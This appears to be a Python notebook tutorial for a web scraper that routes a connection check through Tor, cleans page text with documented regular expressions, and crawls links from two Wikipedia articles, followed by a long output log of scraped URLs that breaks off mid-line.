!pip install torpy -U
!pip install pandas
!pip install bs4
!pip install html5lib
import requests
from bs4 import BeautifulSoup
import re
import pandas as pd
import time
from urllib.parse import urljoin
from io import StringIO
# Optional function to use to check your IP address before using TOR to compare with the TOR IP address to ensure TOR is working
def check_ip():
try:
response = requests.get('https://ifconfig.me', timeout=10)
print("Current IP:", response.text.strip())
except Exception as e:
print(f"Failed to check IP address: {e}")
def init():
# Optional: Check IP before using Tor
# print("IP before Tor:")
# check_ip()
from torpy import TorClient
hostname = 'ifconfig.me' # It's possible use onion hostname here as well
with TorClient() as tor:
# Choose random guard node and create 3-hops circuit
with tor.create_circuit(3) as circuit:
# Create tor stream to host
with circuit.create_stream((hostname, 80)) as stream:
# Now we can communicate with host
stream.send(b'GET / HTTP/1.0\r\nHost: %s\r\n\r\n' % hostname.encode())
recv = stream.recv(1024)
print("IP Used by Tor:", recv.decode().strip())
return 0
r"[^A-Za-z0-9,;:.()?\s…'’%$\-\"“”—]+"
¶r"|(?<!\d)\%"
¶r"|\$(?!\d)"
¶r"|(?<![A-Za-z\s])-|-(?![A-Za-z\s])"
¶r"|(?<!\w)['’\"“”](?!\w)"
,¶[^A-Za-z0-9,;:.()?\s…'’%$\-\"“”—]+
¶[^ ]
: This denotes a negated character class, which matches any character not listed inside the brackets.¶A-Za-z0-9
: Matches any uppercase letter (A-Z), lowercase letter (a-z), or digit (0-9).¶,;:.()?
: Matches the punctuation characters comma, semicolon, colon, period, parentheses, and question mark.¶\s
: Matches any whitespace character (space, tab, newline, etc.).¶…
: Matches the ellipsis character.¶'’
: Matches both straight and curly apostrophes/single quotes.¶%$-
: Matches the percent sign %, dollar sign $, and hyphen -.¶\"“”
: Matches straight double quotes ", curly left double quote “, and curly right double quote ”.¶—
: Matches em dashes.¶+
: Matches one or more of the preceding elements (inside the square brackets). This part effectively removes any sequence of characters that do not match the specified characters.¶Purpose: This ensures athat all characters represented inside the square brackets will be retained in the scraped text.
(?<!\d)\%
¶\%
: Matches the percent sign character.¶(?<!\d)
: An assertion that checks if the character immediately preceding the %
is not a digit. If this condition is true, it will match the %
sign and allow you to remove it.¶Purpose: This ensures that only %
signs directly associated with numeric percentages (like "50%") are retained.
\$(?!\d)
¶\$
: Matches the dollar sign character.¶(?!\d)
: An assertion that checks if the character immediately following the $
is not a digit. If this condition is true, it will match the $
sign and allow you to remove it.¶Purpose: This ensures that only $
signs directly associated with numeric amounts (like "$100") are retained.
(?<![A-Za-z\s])-|-(?![A-Za-z\s])
¶(?<![A-Za-z\s])-
: An assertion that matches a hyphen - if it is not preceded by a letter or a space.¶-(?![A-Za-z\s])
: An assertion that matches a hyphen - if it is not followed by a letter or a space.¶Purpose: This removes hyphens that are not part of hyphenated words, or not part of sentences where there is a space on one side of a hyphen, such as in "Short- and long-term goals are important."
(?<!\w)['’\"“”](?!\w)
¶['’\"“”]
: Matches either a straight '
or curly ’
single quote/apostrophe, or a straight or curly double quotation.¶(?<!\w)
: An assertion that matches a quote or apostrophe if it is not preceded by a word character (letters, digits, or underscore).¶(?!\w)
: An assertion that matches a quote or apostrophe if it is not followed by a word character.¶Purpose: This allows you to remove single or double quotes or apostrophes that are not part of a word or contraction.
# The following code uses the threading library, which can help prevent the scraper from hanging indefinitely
# on a single request.
import threading
# fetch_url performs an HTTP GET request to fetch a URL using a requests.Session object.
# The result of the request (either a response or an exception) is stored in a result list at the specified index.
# Thread Role: This function encapsulates the logic that will be run concurrently in a thread, isolating the network
# operation to prevent blocking the main execution flow.
def fetch_url(session, url, result, index, timeout_duration):
try:
response = session.get(url, timeout=timeout_duration)
result[index] = response
except Exception as e:
result[index] = e
from bs4 import BeautifulSoup
import re
def my_scraper(tmp_url_in, scrape_timeout=40):
tmp_text = ''
max_retries = 3
attempt = 0
scraped_tables_html = ''
response = None # Initialize response to None
while attempt <= max_retries:
session = requests.Session()
session.max_redirects = 3
# Use a list to store the response or exception
result = [None]
# Start a thread to fetch the URL
# This line creates a new Thread object. The target argument specifies the function to run in the new
# thread (fetch_url), and args provides the arguments to pass to this function when it starts.
# 0: Specifies the index in the result list where the response will be stored, allowing the main thread
# to access the result after the thread completes.
thread = threading.Thread(target=fetch_url, args=(session, tmp_url_in, result, 0, scrape_timeout))
thread.start() # Executes the thread, allowing the fetch_url function to run concurrently with the main program.
thread.join(timeout=scrape_timeout) # Waits for the thread to complete its task, up to a specified timeout
if thread.is_alive(): # Checks if thread is still running after the timeout specified in the join() call has elapsed.
print(f"Scraping timed out for {tmp_url_in}. Moving to next URL.")
thread.join() # Ensures thread is properly joined, then terminated (to prevent hanging), and cleans up resources.
attempt += 1
time.sleep(5)
continue # Retry in case of a timeout
# Get the response from the result
response = result[0]
if isinstance(response, requests.Response):
if response.status_code == 200:
if 'text/html' in response.headers.get('Content-Type', ''):
soup = BeautifulSoup(response.text, 'html.parser')
# Revised line to strip HTML tags
tmp_text = ' '.join(p.get_text() for p in soup.find_all('p')).replace('\n', ' ')
# Decode the text to process escape sequences. If you do not use this line, backshlahses may only be hidden and not removed.
# To ensure that the backslashes are actually removed, first explicitly decode the string characters so backslashes will be
# visible.
tmp_text = tmp_text.encode('unicode_escape').decode('unicode_escape')
tmp_text = re.sub(
r"[^A-Za-z0-9,;:.()?\s…'’%$\-\"“”—]+" # Match unwanted characters
r"|(?<!\d)\%" # Remove standalone percent signs not preceded by a digit
r"|\$(?!\d)" # Remove standalone dollar signs not followed by a digit
r"|(?<![A-Za-z\s])-|-(?![A-Za-z\s])" # Handle hyphens in certain contexts
r"|(?<!\w)['’\"“”](?!\w)", # Handle quotes in certain contexts
' ',
tmp_text
)
# Replace any sequence of multiple whitespace characters (spaces, tabs, newlines, etc.) with a single
# space and then trim leading and trailing whitespace from the string.
tmp_text = re.sub(r'\s+', ' ', tmp_text).strip()
if soup.find('table'):
tables_html = [str(table) for table in soup.find_all('table')]
scraped_tables_html = ''.join(tables_html)
result_message = "Scraped text and tables"
else:
result_message = "Scraped text only"
print(f"{result_message}: {tmp_url_in}")
break # Successfully scraped, exit the loop
else:
print(f"Non-HTML content type for {tmp_url_in}: {response.headers.get('Content-Type')}")
break
else:
print(f"Failed to scrape {tmp_url_in}: Status code {response.status_code}")
break
elif isinstance(response, requests.exceptions.RequestException):
print(f"Failed to scrape {tmp_url_in}: {response}")
break # Unsuccessful connection, exit the loop
if response is None:
# If no response was ever received, indicate this explicitly
print(f"Failed to scrape {tmp_url_in}: No response received.")
return tmp_text, scraped_tables_html
def fetch_urls(user_urls):
from bs4 import BeautifulSoup
import re
all_urls = []
for url in user_urls:
try:
response = requests.get(url, timeout=30)
soup = BeautifulSoup(response.text, "html.parser")
for link in soup.find_all('a', href=True):
full_url = urljoin(url, link['href'])
all_urls.append((url, full_url))
except Exception as e:
print(f"Failed to fetch URLs from {url}: {e}")
continue
all_urls = list(set(all_urls)) # Remove any potential duplicate URLs
return all_urls
def write_crawl_results(user_urls):
import re
import pandas as pd
tmp_pd = pd.DataFrame(columns=['original_url', 'scraped_url', 'scraped_text', 'scraped_tables'])
init()
all_urls = fetch_urls(user_urls)
for original_url, scraped_url in all_urls:
if not scraped_url.startswith(('http://', 'https://')):
scraped_url = urljoin(original_url, scraped_url)
scraped_text, scraped_tables = my_scraper(scraped_url)
if scraped_text or scraped_tables:
try:
tmp_pd = pd.concat([tmp_pd, pd.DataFrame({
'original_url': [original_url],
'scraped_url': [scraped_url],
'scraped_text': [scraped_text],
'scraped_tables': [scraped_tables]
})], ignore_index=True)
except Exception as e:
print(f"Failed to append data for {scraped_url}: {e}")
pass
return tmp_pd
user_provided_urls = [
'https://en.wikipedia.org/wiki/Web_scraping',
'https://en.wikipedia.org/wiki/Data_scraping',
# Add more URLs as needed
]
final_data = write_crawl_results(user_provided_urls)
IP Used by Tor: HTTP/1.0 200 OK date: Sat, 17 Aug 2024 15:28:16 GMT content-type: text/plain Content-Length: 14 access-control-allow-origin: * via: 1.1 google 107.189.10.175 Scraped text and tables: https://en.wikipedia.org/wiki/Facebook,_Inc._v._Power_Ventures,_Inc. Scraped text and tables: https://en.wikipedia.org/wiki/Reuters Scraped text only: https://en.wikipedia.org/wiki/Wrapper_(data_mining) Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#See_also Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-21 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#References Scraped text only: https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_ref-3 Scraped text and tables: https://en.wikipedia.org/wiki/Data_structures Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-30 Scraped text and tables: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Use Scraped text and tables: https://en.wikipedia.org/wiki/Web_shell Scraped text and tables: https://en.wikipedia.org/w/index.php?title=Web_scraping&oldid=1240545829 Scraped text and tables: https://en.wikipedia.org/wiki/Fake_news_website Scraped text and tables: https://en.wikipedia.org/wiki/Data_collection Scraped text and tables: https://en.wikipedia.org/wiki/Help:Category Scraped text and tables: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Universal_Code_of_Conduct Scraped text only: https://pubmed.ncbi.nlm.nih.gov/23632294 Scraped text and tables: https://en.wikipedia.org/wiki/Digital_rights_management Scraped text and tables: https://en.wikipedia.org/wiki/Maritime_and_Commercial_Court_(Denmark) Scraped text and tables: https://en.wikipedia.org/wiki/Spam_Act_2003 Scraped text and tables: https://en.wikipedia.org/wiki/Special:Random Failed to scrape http://scholarship.law.berkeley.edu/btlj/vol29/iss4/16/: HTTPSConnectionPool(host='scholarship.law.berkeley.edubtlj', port=443): Max retries exceeded with url: /vol29/iss4/16/ (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x0000023AC2C01610>: Failed to establish a new connection: [Errno 11001] getaddrinfo failed')) Scraped text and tables: https://en.wikipedia.org/wiki/Semantic_web Scraped text and tables: https://en.wikipedia.org/wiki/World_Wide_Web_Wanderer Scraped text and tables: https://en.wikipedia.org/w/index.php?title=Web_scraping&printable=yes Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#HTTP_programming Non-HTML content type for https://s3.us-west-2.amazonaws.com/research-papers-mynk/Breaking-Fraud-And-Bot-Detection-Solutions.pdf: application/pdf Non-HTML content type for https://web.archive.org/web/20161011080619/https://pdfs.semanticscholar.org/4fb4/3c5a212df751e84c3b2f8d29fabfe56c3616.pdf: application/pdf Scraped text only: https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit§ion=1 Scraped text and tables: https://en.wikipedia.org/wiki/XHTML Scraped text and tables: https://en.wikipedia.org/wiki/Template:Data Scraped text and tables: https://en.wikipedia.org/wiki/Salesforce.com Scraped text and tables: https://web.archive.org/web/20160305025808/http://www.thefreelibrary.com/American+Airlines,+FareChase+Settle+Suit.-a0103213546 Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=5 Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_ref-1 Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=10 Scraped text and tables: https://en.wikipedia.org/wiki/Category:Articles_needing_additional_references_from_February_2011 Scraped text and tables: https://en.wikipedia.org/wiki/Application_firewall Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#Web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Computer_fraud Scraped text and tables: https://en.wikipedia.org/wiki/Privilege_escalation Scraped text and tables: https://en.wikipedia.org/wiki/ISSN_(identifier) Scraped text only: https://www.worldcat.org/issn/0148-2963 Scraped text only: https://en.wikipedia.org/wiki/Change_detection_and_notification Scraped text and tables: https://en.wikipedia.org/wiki/Cyberterrorism Scraped text and tables: https://en.wikipedia.org/wiki/Load_(computing) Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#History Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#Further_reading Scraped text and tables: https://en.wikipedia.org/wiki/Robustness_(computer_science) Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_ref-8 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-2 Scraped text and tables: https://en.wikipedia.org/wiki/Special:BookSources/9781595936097 Scraped text only: https://en.wikipedia.org/wiki/Category:Web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Data_lineage Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-19 Scraped text and tables: https://en.wikipedia.org/wiki/HTML Scraped text and tables: https://en.wikipedia.org/wiki/XPath Scraped text and tables: https://en.wikipedia.org/wiki/Phishing Scraped text and tables: https://en.wikipedia.org/wiki/Web_page Failed to scrape https://academic.oup.com/bib/article/15/5/788/2422275: Status code 403 Scraped text and tables: https://en.wikipedia.org/wiki/QVC Scraped text and tables: https://en.wikipedia.org/wiki/Data_cleansing Scraped text and tables: https://en.wikipedia.org/wiki/Email_spoofing Scraped text and tables: https://id.wikipedia.org/wiki/Menggali_web Scraped text only: https://en.wikipedia.org/w/index.php?title=Data_scraping&action=history Scraped text only: https://en.wikipedia.org/wiki/Quotron Scraped text and tables: https://en.wikipedia.org/wiki/Wiper_(malware) Scraped text and tables: https://en.wikipedia.org/wiki/Ransomware Scraped text and tables: https://en.wikipedia.org/wiki/Rootkit Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:Verifiability Non-HTML content type for https://web.archive.org/web/20110723132015/http://www.fornova.net/documents/pblog-bna-com.pdf: application/pdf Scraped text and tables: https://en.wikipedia.org/wiki/Main_Page Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-11 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-12 Scraped text and tables: https://en.wikipedia.org/wiki/Search_engine_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Big_data Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_note-11 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-24 Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=16 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-20 Scraped text only: https://doi.org/10.1016%2Fj.jbusres.2020.06.012 Scraped text and tables: https://en.wikipedia.org/wiki/Arbitrary_code_execution Scraped text and tables: https://ml.wikipedia.org/wiki/%E0%B4%A1%E0%B4%BE%E0%B4%B1%E0%B5%8D%E0%B4%B1_%E0%B4%B8%E0%B5%8D%E0%B4%95%E0%B5%8D%E0%B4%B0%E0%B4%BE%E0%B4%AA%E0%B5%8D%E0%B4%AA%E0%B4%BF%E0%B4%82%E0%B4%97%E0%B5%8D Scraped text and tables: https://en.wikipedia.org/wiki/Special:EditPage/Template:Information_security Scraped text only: https://en.wikipedia.org/wiki/Contact_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Dow_Jones_%26_Company Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#Vertical_aggregation Scraped text and tables: https://en.wikipedia.org/wiki/Data_analysis Scraped text and tables: https://en.wikipedia.org/wiki/Screen_reader Scraped text and tables: https://en.wikipedia.org/wiki/Parsing Scraped text only: https://ru.wikipedia.org/wiki/%D0%92%D0%B5%D0%B1-%D1%81%D0%BA%D1%80%D0%B5%D0%B9%D0%BF%D0%B8%D0%BD%D0%B3 Scraped text and tables: https://en.wikipedia.org/wiki/Dynamic_web_page Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:File_Upload_Wizard Scraped text and tables: https://en.wikipedia.org/wiki/Data_entry_clerk Scraped text and tables: https://en.wikipedia.org/wiki/Data_(computer_science) Scraped text only: https://fr.wikipedia.org/wiki/Capture_de_donn%C3%A9es_d%27%C3%A9cran Scraped text only: https://en.wikipedia.org/wiki/Wikipedia:Contact_us Scraped text only: https://en.wikipedia.org/wiki/Special:EditPage/Data_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Help:Maintenance_template_removal Scraped text and tables: https://en.wikipedia.org/wiki/Scareware Scraped text only: https://doi.org/10.1145%2F1281192.1281287 Scraped text and tables: https://cs.wikipedia.org/wiki/Web_scraping Scraped text and tables: https://ary.wikipedia.org/wiki/%D8%AA%D8%BA%D8%B1%D8%A7%D9%81_%D9%84%D9%88%D9%8A%D8%A8 Scraped text and tables: https://en.wikipedia.org/wiki/Internet_security Scraped text only: https://en.wikipedia.org/wiki/Database_connection Scraped text only: https://en.wikipedia.org/wiki/Special:EditPage/Template:Data Scraped text and tables: https://en.wikipedia.org/wiki/Data_steward Scraped text and tables: https://zh-yue.wikipedia.org/wiki/%E7%B6%B2%E9%A0%81%E5%88%AE%E6%96%99 Scraped text only: https://ca.wikipedia.org/wiki/Web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:General_disclaimer Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=6 Scraped text and tables: https://en.wikipedia.org/wiki/United_Kingdom Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-31 Scraped text only: https://en.wikipedia.org/wiki/Hdl_(identifier) Scraped text and tables: https://en.wikipedia.org/wiki/Data_type Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-19 Scraped text and tables: https://en.wikipedia.org/wiki/Data_breach Scraped text and tables: https://en.wikipedia.org/wiki/Internet_Explorer Scraped text and tables: https://en.wikipedia.org/wiki/Data_editing Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-26 Failed to scrape https://pdfs.semanticscholar.org/4fb4/3c5a212df751e84c3b2f8d29fabfe56c3616.pdf: Status code 202 Scraped text and tables: https://ja.wikipedia.org/wiki/%E3%82%A6%E3%82%A7%E3%83%96%E3%82%B9%E3%82%AF%E3%83%AC%E3%82%A4%E3%83%94%E3%83%B3%E3%82%B0 Scraped text and tables: https://en.wikipedia.org/wiki/OpenSocial Scraped text only: https://www.technologyreview.com/2012/06/01/85817/a-startup-hopes-to-help-computers-understand-web-pages/ Scraped text and tables: https://en.wikipedia.org/wiki/Category:Short_description_matches_Wikidata Scraped text and tables: https://en.wikipedia.org/wiki/Document_Object_Model Scraped text and tables: https://en.wikipedia.org/wiki/ISBN_(identifier) Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=14 Scraped text and tables: https://en.wikipedia.org/wiki/CSS_sprite Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:WikiProject_Countering_systemic_bias Scraped text and tables: https://en.wikipedia.org/wiki/Data_philanthropy Failed to scrape https://www.nytimes.com/2016/05/07/your-money/jamie-dimon-wants-to-protect-you-from-innovative-start-ups.html: Status code 403 Scraped text and tables: https://en.wikipedia.org/wiki/Talk:Data_scraping Scraped text only: https://www.worldcat.org/issn/1086-3818 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#AI-powered_document_understanding Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-23 Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=18 Scraped text and tables: https://en.wikipedia.org/wiki/Screen_scraping Scraped text and tables: https://en.wikipedia.org/wiki/World_Wide_Web Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=19 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-16 Scraped text and tables: https://en.wikipedia.org/wiki/Archive.today Scraped text and tables: https://en.wikipedia.org/wiki/Infostealer Scraped text and tables: https://en.wikipedia.org/wiki/DNSBL Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Spyware Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#bodyContent Scraped text and tables: https://en.wikipedia.org/wiki/History_of_the_World_Wide_Web Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-3 Scraped text and tables: https://en.wikipedia.org/wiki/Source_code Scraped text and tables: https://en.wikipedia.org/wiki/Data_farming Scraped text only: https://en.wikipedia.org/w/index.php?title=Special:UserLogin&returnto=Web+scraping Scraped text and tables: https://en.wikipedia.org/wiki/Zombie_(computing) Scraped text and tables: https://en.wikipedia.org/wiki/Help:Category Scraped text and tables: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Universal_Code_of_Conduct Scraped text only: https://developer.wikimedia.org Scraped text and tables: https://zh.wikipedia.org/wiki/%E7%BD%91%E9%A1%B5%E6%8A%93%E5%8F%96 Scraped text and tables: https://en.wikipedia.org/wiki/Data_degradation Scraped text and tables: https://en.wikipedia.org/wiki/Chase_Bank Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:Contents Scraped text and tables: https://en.wikipedia.org/wiki/String_(computer_science) Scraped text and tables: https://en.wikipedia.org/wiki/Special:Random Scraped text and tables: https://en.wikipedia.org/wiki/Cvent,_Inc. Scraped text and tables: https://en.wikipedia.org/wiki/Job_wrapping Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-15 Scraped text and tables: https://web.archive.org/web/20120624103316/http://www.lkshields.ie/htmdocs/publications/newsletters/update26/update26_03.htm Scraped text and tables: https://en.wikipedia.org/wiki/Category:CS1_maint:_multiple_names:_authors_list Scraped text and tables: https://en.wikipedia.org/wiki/Google Scraped text and tables: https://en.wikipedia.org/wiki/Data_munging Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_ref-4 Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#Screen_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#HTML_parsing Scraped text and tables: https://eu.wikipedia.org/wiki/Web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Teleprinter Scraped text and tables: https://en.wikipedia.org/wiki/Application_security Scraped text and tables: https://en.wikipedia.org/wiki/Personal_property Scraped text and tables: https://en.wikipedia.org/wiki/Trespass_to_chattels Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=4 Scraped text and tables: https://en.wikipedia.org/wiki/Southwest_Airlines Scraped text and tables: https://en.wikipedia.org/wiki/Category:Articles_needing_additional_references_from_April_2023 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-20 Scraped text and tables: https://en.wikipedia.org/wiki/Category:Articles_with_unsourced_statements_from_April_2023 Failed to scrape https://www.jstor.org/action/doBasicSearch?Query=%22Data+scraping%22&acc=on&wc=on: Status code 420 Scraped text and tables: https://en.wikipedia.org/wiki/Data_scrubbing Scraped text and tables: https://en.wikipedia.org/wiki/Portal:Current_events Scraped text and tables: https://en.wikipedia.org/wiki/Data_security Scraped text only: https://proxyway.com/guides/what-is-web-scraping Scraped text and tables: https://en.wikipedia.org/wiki/Central_processing_unit Scraped text and tables: https://en.wikipedia.org/wiki/Category:All_articles_needing_additional_references Scraped text and tables: https://en.wikipedia.org/wiki/URL Scraped text and tables: https://en.wikipedia.org/wiki/Perl Scraped text and tables: https://en.wikipedia.org/wiki/Comparison_of_feed_aggregators Scraped text and tables: https://en.wikipedia.org/wiki/Help:Referencing_for_beginners Scraped text only: https://en.wikipedia.org/wiki/Special:WhatLinksHere/Data_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-8 Scraped text and tables: https://en.wikipedia.org/wiki/Auction_sniping Scraped text and tables: https://en.wikipedia.org/wiki/Grep Scraped text only: https://en.wikipedia.org/w/index.php?title=Special:UserLogin&returnto=Data+scraping Scraped text and tables: https://en.wikipedia.org/wiki/Telnet Scraped text and tables: https://en.wikipedia.org/wiki/Template_talk:Data Scraped text and tables: https://en.wikipedia.org/wiki/Data_loading Scraped text and tables: https://en.wikipedia.org/wiki/DOM_clobbering Scraped text and tables: https://en.wikipedia.org/wiki/Runtime_application_self-protection Scraped text and tables: https://en.wikipedia.org/wiki/Code_obfuscation Scraped text only: https://support.google.com/websearch/answer/86640?hl=en Scraped text and tables: https://en.wikipedia.org/wiki/Data_management Scraped text and tables: https://en.wikipedia.org/wiki/CAPTCHA Scraped text and tables: https://en.wikipedia.org/wiki/Documentation Scraped text and tables: https://en.wikipedia.org/wiki/Secure_by_default Scraped text and tables: https://en.wikipedia.org/wiki/Memory_(computers) Scraped text and tables: https://en.wikipedia.org/wiki/Data_transmission Scraped text and tables: https://en.wikipedia.org/wiki/Metadata Scraped text and tables: https://en.wikipedia.org/wiki/Defendant Scraped text and tables: https://web.archive.org/web/20020308222536/http://www.chillingeffects.org/linking/faq.cgi#QID460 Scraped text and tables: https://en.wikipedia.org/wiki/Computer_port_(hardware) Scraped text only: https://en.wikipedia.org/wiki/Program_crash Scraped text and tables: https://doi.org/10.5334%2Fdsj-2021-024 Scraped text and tables: https://en.wikipedia.org/wiki/Computer_vision Scraped text and tables: https://en.wikipedia.org/wiki/Van_Buren_v._United_States Scraped text only: https://en.wikipedia.org/wiki/Special:Search Scraped text and tables: https://en.wikipedia.org/wiki/Data_wrangling Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_note-4 Scraped text and tables: https://en.wikipedia.org/wiki/Data_mining Scraped text and tables: https://en.wikipedia.org/wiki/Website Scraped text and tables: https://en.wikipedia.org/wiki/United_States_Supreme_Court Failed to scrape http://www.fornova.net/documents/pblog-bna-com.pdf: Status code 404 Scraped text and tables: https://en.wikipedia.org/wiki/Supreme_Court_of_the_United_States Scraped text and tables: https://en.wikipedia.org/wiki/Investment_banking Scraped text and tables: https://en.wikipedia.org/wiki/GUI Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#Methods_to_prevent_web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Copy_protection Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=12 Scraped text only: https://en.wikipedia.org/wiki/End-user Scraped text only: https://en.wikipedia.org/wiki/Category:Web_crawlers Scraped text only: https://id.wikipedia.org/wiki/Pengorekan_data Scraped text and tables: https://en.wikipedia.org/wiki/Human-readable_medium Scraped text and tables: https://en.wikipedia.org/wiki/Data_compression Scraped text and tables: https://en.wikipedia.org/wiki/Machine_learning Scraped text and tables: https://en.wikipedia.org/wiki/Category:CS1_French-language_sources_(fr) Scraped text only: https://en.wikipedia.org/wiki/Special:SpecialPages Scraped text and tables: https://en.wikipedia.org/wiki/Michael_Hanna_(judge) Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-30 Scraped text and tables: https://en.wikipedia.org/wiki/Time_bomb_(software) Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:Community_portal Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-25 Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping Scraped text and tables: https://en.wikipedia.org/wiki/History_sniffing Scraped text and tables: https://en.wikipedia.org/wiki/Data_synchronization Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:File_Upload_Wizard Scraped text only: https://en.wikipedia.org/wiki/Enterprise_resource_planning Scraped text only: https://en.wikipedia.org/wiki/Wikipedia:Contact_us Scraped text and tables: https://en.wikipedia.org/wiki/Static_web_page Scraped text and tables: https://en.wikipedia.org/wiki/Keystroke_logging Scraped text only: https://pt.wikipedia.org/wiki/Raspagem_de_dados Scraped text and tables: https://en.wikipedia.org/wiki/Insecure_direct_object_reference Scraped text and tables: https://en.wikipedia.org/wiki/Web_crawler Scraped text and tables: https://en.wikipedia.org/wiki/IP_address Scraped text and tables: https://en.wikipedia.org/wiki/Polymorphic_engine Failed to scrape https://doi.org/10.1093%2Fbib%2Fbbt026: Status code 403 Scraped text and tables: https://en.wikipedia.org/wiki/Database Scraped text only: https://www.worldcat.org/issn/1683-1470 Scraped text and tables: https://en.wikipedia.org/wiki/File:Question_book-new.svg Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-12 Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:General_disclaimer Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=20 Scraped text and tables: https://en.wikipedia.org/wiki/Host-based_intrusion_detection_system Scraped text only: https://www.scribd.com/doc/249068700/LinkedIn-v-Resultly-LLC-Complaint?secret_password=pEVKDbnvhQL52oKfdrmT Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#bodyContent Scraped text and tables: https://fr.wikipedia.org/wiki/Web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-32 Scraped text and tables: http://www.tomwbell.com/NetLaw/Ch06.html Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_ref-5 Scraped text and tables: https://scholar.google.com/scholar?q=%22Web+scraping%22 Scraped text and tables: https://en.wikipedia.org/wiki/Social_engineering_(security) Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-31 Scraped text and tables: https://en.wikipedia.org/wiki/Category:Short_description_matches_Wikidata Scraped text only: https://web.archive.org/web/20160304205109/http://connection.ebscohost.com/c/product-reviews/2235513/data-pump-transforms-host-data Scraped text only: https://en.wikipedia.org/wiki/Legacy_system Scraped text and tables: https://en.wikipedia.org/wiki/Site_isolation Scraped text and tables: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy Scraped text and tables: https://en.wikipedia.org/wiki/Denial-of-service_attack Scraped text and tables: http://www.tomwbell.com/NetLaw/Ch07/Ticketmaster.html Scraped text and tables: https://en.wikipedia.org/wiki/Backdoor_(computing) Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-3 Scraped text and tables: https://en.m.wikipedia.org/w/index.php?title=Data_scraping&mobileaction=toggle_view_mobile Scraped text and tables: https://en.wikipedia.org/wiki/Injunction Scraped text and tables: https://en.wikipedia.org/wiki/Code_injection Scraped text and 